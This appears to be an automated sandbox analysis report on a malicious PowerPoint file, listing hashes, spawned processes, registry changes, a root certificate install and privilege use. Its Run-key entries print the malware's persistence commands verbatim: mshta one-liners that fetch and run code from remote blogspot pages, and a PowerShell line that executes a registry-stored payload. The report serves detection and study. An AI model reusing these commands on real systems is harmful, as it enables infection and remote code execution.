56dd6d0c5eacf5a7ec7233c4acb4cf97df95f66ed5d4d4880dca62f6b4b27a69

General

Target

sample.ppt
Size

224KB
MD5

f93b770274956fb4b09e4962a45c32da
SHA1

8e295f26e68ea595aaee521db9d29d39425ffbb1
SHA256

56dd6d0c5eacf5a7ec7233c4acb4cf97df95f66ed5d4d4880dca62f6b4b27a69
SHA512

98856b284df590ec1bf8e4edeab529315a3115a9f7d1a277328fa6ad4fcf25fa120b814a5714148df05386ff4d738523b3bec1617745631a766efab5cf95ced0

Score

10^/10

persistence

Malware Config

Signatures

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

MSHTA.exeping.exeping.exe

description	pid	pid_target	process	target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE is not expected to spawn this process	884	1784	MSHTA.exe	POWERPNT.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE is not expected to spawn this process	1820	1784	ping.exe	POWERPNT.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE is not expected to spawn this process	1280	1784	ping.exe	POWERPNT.EXE

Blocklisted process makes network request 11 IoCs

Processes:

MSHTA.exeWScript.exe

flow	pid	process
7	884	MSHTA.exe
9	884	MSHTA.exe
11	884	MSHTA.exe
13	884	MSHTA.exe
14	884	MSHTA.exe
16	884	MSHTA.exe
18	884	MSHTA.exe
19	884	MSHTA.exe
22	1160	WScript.exe
24	1160	WScript.exe
26	1160	WScript.exe

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

MSHTA.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"mshta http://1230948%1230948@titupatiyannala-myrynaal.blogspot.com/p/42.html\"\", 0 : window.close\")"	MSHTA.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run\nunukhaoo = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"mshta http://1230948%1230948@papagunnakjllidmc.blogspot.com/p/42.html\"\", 0 : window.close\")"	MSHTA.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run\phulihoja = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).btfee)\|IEX\"\", 0 : window.close\")"	MSHTA.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run	MSHTA.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run\phulihoja = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).cutona)\|IEX\"\", 0 : window.close\")"	MSHTA.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run\dkkkksakdosexography = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"mshta http://1230948%1230948@bublicamukajuka.blogspot.com/p/42.html\"\", 0 : window.close\")"	MSHTA.exe

Drops file in Windows directory 1 IoCs

Processes:

winword.exe

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log winword.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1276 schtasks.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

2132 taskkill.exe
2120 taskkill.exe

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	winword.exe

pid	process
1276	schtasks.exe

pid	process
2132	taskkill.exe
2120	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 10 IoCs

adware spyware

Modify Registry

T1112

Processes:

POWERPNT.EXEMSHTA.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	POWERPNT.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	POWERPNT.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	POWERPNT.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	POWERPNT.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt	POWERPNT.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	POWERPNT.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	POWERPNT.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main	MSHTA.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar	POWERPNT.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	POWERPNT.EXE

Modifies registry class 64 IoCs

Processes:

POWERPNT.EXE

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A69-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\Version = "2.a"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A76-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\Version = "2.a"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493457-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493460-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493462-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493478-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493482-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F5-5A91-11CF-8700-00AA0060263B}\ = "TableStyle"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A7B-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149347E-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A59-F07E-4CA4-AF6F-BEF486AA4E6F}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493450-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493499-5A91-11CF-8700-00AA0060263B}\ = "TextStyle"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934D9-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A68-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\Version = "2.a"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A78-F07E-4CA4-AF6F-BEF486AA4E6F}\ = "TickLabels"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493442-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493472-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149347C-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934E8-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F7-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F7-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E556-4FF5-48F4-8215-5505F990966F}\TypeLib\Version = "2.a"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493452-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493473-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149347F-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934E3-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A57-F07E-4CA4-AF6F-BEF486AA4E6F}\ = "ChartCharacters"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A5C-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493465-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493475-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493487-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934E1-5A91-11CF-8700-00AA0060263B}\ = "EffectParameters"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493469-5A91-11CF-8700-00AA0060263B}\ = "Slides"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493469-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493476-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493478-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493456-5A91-11CF-8700-00AA0060263B}\ = "SlideShowWindows"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149347A-5A91-11CF-8700-00AA0060263B}\ = "ShapeRange"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493453-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149348E-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934DD-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F9-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A7A-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493487-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934EA-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A7A-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E558-4FF5-48F4-8215-5505F990966F}\ = "Broadcast"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493454-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493473-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493498-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934D7-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934DE-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493458-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149348A-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493493-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934D3-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934EA-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A50-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149345A-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493461-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149347B-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149347B-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934D8-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

WScript.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 0f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec53726187760b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e31d000000010000001000000099949d2179811f6b30a8c99c4f6b42260300000001000000140000002796bae63f1801e277261ba0d77770028f20eee420000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 19000000010000001000000063664b080559a094d10f0a3c5f4f62900300000001000000140000002796bae63f1801e277261ba0d77770028f20eee41d000000010000001000000099949d2179811f6b30a8c99c4f6b4226140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e309000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec537261877620000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	WScript.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery
T1018

Processes:

ping.exeping.exe

pid process

1820 ping.exe
1280 ping.exe
Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

POWERPNT.EXEwinword.exe

pid process

1784 POWERPNT.EXE
1908 winword.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

2084 powershell.exe
1964 powershell.exe
1964 powershell.exe
2084 powershell.exe

pid	process
1820	ping.exe
1280	ping.exe

pid	process
1784	POWERPNT.EXE
1908	winword.exe

pid	process
2084	powershell.exe
1964	powershell.exe
1964	powershell.exe
2084	powershell.exe

Suspicious use of AdjustPrivilegeToken 44 IoCs

Processes:

taskkill.exetaskkill.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2132	taskkill.exe
Token: SeDebugPrivilege	2120	taskkill.exe
Token: SeDebugPrivilege	2084	powershell.exe
Token: SeDebugPrivilege	1964	powershell.exe
Token: SeIncreaseQuotaPrivilege	2084	powershell.exe
Token: SeSecurityPrivilege	2084	powershell.exe
Token: SeTakeOwnershipPrivilege	2084	powershell.exe
Token: SeLoadDriverPrivilege	2084	powershell.exe
Token: SeSystemProfilePrivilege	2084	powershell.exe
Token: SeSystemtimePrivilege	2084	powershell.exe
Token: SeProfSingleProcessPrivilege	2084	powershell.exe
Token: SeIncBasePriorityPrivilege	2084	powershell.exe
Token: SeCreatePagefilePrivilege	2084	powershell.exe
Token: SeBackupPrivilege	2084	powershell.exe
Token: SeRestorePrivilege	2084	powershell.exe
Token: SeShutdownPrivilege	2084	powershell.exe
Token: SeDebugPrivilege	2084	powershell.exe
Token: SeSystemEnvironmentPrivilege	2084	powershell.exe
Token: SeRemoteShutdownPrivilege	2084	powershell.exe
Token: SeUndockPrivilege	2084	powershell.exe
Token: SeManageVolumePrivilege	2084	powershell.exe
Token: 33	2084	powershell.exe
Token: 34	2084	powershell.exe
Token: 35	2084	powershell.exe
Token: SeIncreaseQuotaPrivilege	2084	powershell.exe
Token: SeSecurityPrivilege	2084	powershell.exe
Token: SeTakeOwnershipPrivilege	2084	powershell.exe
Token: SeLoadDriverPrivilege	2084	powershell.exe
Token: SeSystemProfilePrivilege	2084	powershell.exe
Token: SeSystemtimePrivilege	2084	powershell.exe
Token: SeProfSingleProcessPrivilege	2084	powershell.exe
Token: SeIncBasePriorityPrivilege	2084	powershell.exe
Token: SeCreatePagefilePrivilege	2084	powershell.exe
Token: SeBackupPrivilege	2084	powershell.exe
Token: SeRestorePrivilege	2084	powershell.exe
Token: SeShutdownPrivilege	2084	powershell.exe
Token: SeDebugPrivilege	2084	powershell.exe
Token: SeSystemEnvironmentPrivilege	2084	powershell.exe
Token: SeRemoteShutdownPrivilege	2084	powershell.exe
Token: SeUndockPrivilege	2084	powershell.exe
Token: SeManageVolumePrivilege	2084	powershell.exe
Token: 33	2084	powershell.exe
Token: 34	2084	powershell.exe
Token: 35	2084	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

winword.exe

pid process

1908 winword.exe
1908 winword.exe

pid	process
1908	winword.exe
1908	winword.exe

Suspicious use of WriteProcessMemory 48 IoCs

Processes:

POWERPNT.EXEMSHTA.execmd.exe

description	pid	process	target process
PID 1784 wrote to memory of 1116	1784	POWERPNT.EXE	splwow64.exe
PID 1784 wrote to memory of 1116	1784	POWERPNT.EXE	splwow64.exe
PID 1784 wrote to memory of 1116	1784	POWERPNT.EXE	splwow64.exe
PID 1784 wrote to memory of 1116	1784	POWERPNT.EXE	splwow64.exe
PID 1784 wrote to memory of 884	1784	POWERPNT.EXE	MSHTA.exe
PID 1784 wrote to memory of 884	1784	POWERPNT.EXE	MSHTA.exe
PID 1784 wrote to memory of 884	1784	POWERPNT.EXE	MSHTA.exe
PID 1784 wrote to memory of 884	1784	POWERPNT.EXE	MSHTA.exe
PID 1784 wrote to memory of 1820	1784	POWERPNT.EXE	ping.exe
PID 1784 wrote to memory of 1820	1784	POWERPNT.EXE	ping.exe
PID 1784 wrote to memory of 1820	1784	POWERPNT.EXE	ping.exe
PID 1784 wrote to memory of 1820	1784	POWERPNT.EXE	ping.exe
PID 1784 wrote to memory of 1908	1784	POWERPNT.EXE	winword.exe
PID 1784 wrote to memory of 1908	1784	POWERPNT.EXE	winword.exe
PID 1784 wrote to memory of 1908	1784	POWERPNT.EXE	winword.exe
PID 1784 wrote to memory of 1908	1784	POWERPNT.EXE	winword.exe
PID 1784 wrote to memory of 1280	1784	POWERPNT.EXE	ping.exe
PID 1784 wrote to memory of 1280	1784	POWERPNT.EXE	ping.exe
PID 1784 wrote to memory of 1280	1784	POWERPNT.EXE	ping.exe
PID 1784 wrote to memory of 1280	1784	POWERPNT.EXE	ping.exe
PID 884 wrote to memory of 296	884	MSHTA.exe	cmd.exe
PID 884 wrote to memory of 296	884	MSHTA.exe	cmd.exe
PID 884 wrote to memory of 296	884	MSHTA.exe	cmd.exe
PID 884 wrote to memory of 296	884	MSHTA.exe	cmd.exe
PID 884 wrote to memory of 1964	884	MSHTA.exe	powershell.exe
PID 884 wrote to memory of 1964	884	MSHTA.exe	powershell.exe
PID 884 wrote to memory of 1964	884	MSHTA.exe	powershell.exe
PID 884 wrote to memory of 1964	884	MSHTA.exe	powershell.exe
PID 884 wrote to memory of 1276	884	MSHTA.exe	schtasks.exe
PID 884 wrote to memory of 1276	884	MSHTA.exe	schtasks.exe
PID 884 wrote to memory of 1276	884	MSHTA.exe	schtasks.exe
PID 884 wrote to memory of 1276	884	MSHTA.exe	schtasks.exe
PID 296 wrote to memory of 1160	296	cmd.exe	WScript.exe
